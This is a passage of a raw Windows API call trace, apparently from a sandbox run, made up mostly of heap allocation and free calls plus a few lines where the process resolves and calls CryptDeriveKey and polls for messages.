RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0123.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0123.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43caa48 [0123.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0123.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.147] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0123.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0123.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0123.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0123.147] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac200) returned 1 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0123.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0123.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0123.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0123.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0123.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0123.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0123.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0123.150] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0123.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0123.151] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0123.151] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.151] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0123.151] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0123.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacb8 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0123.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0123.152] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0123.153] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0123.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0123.154] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0123.154] 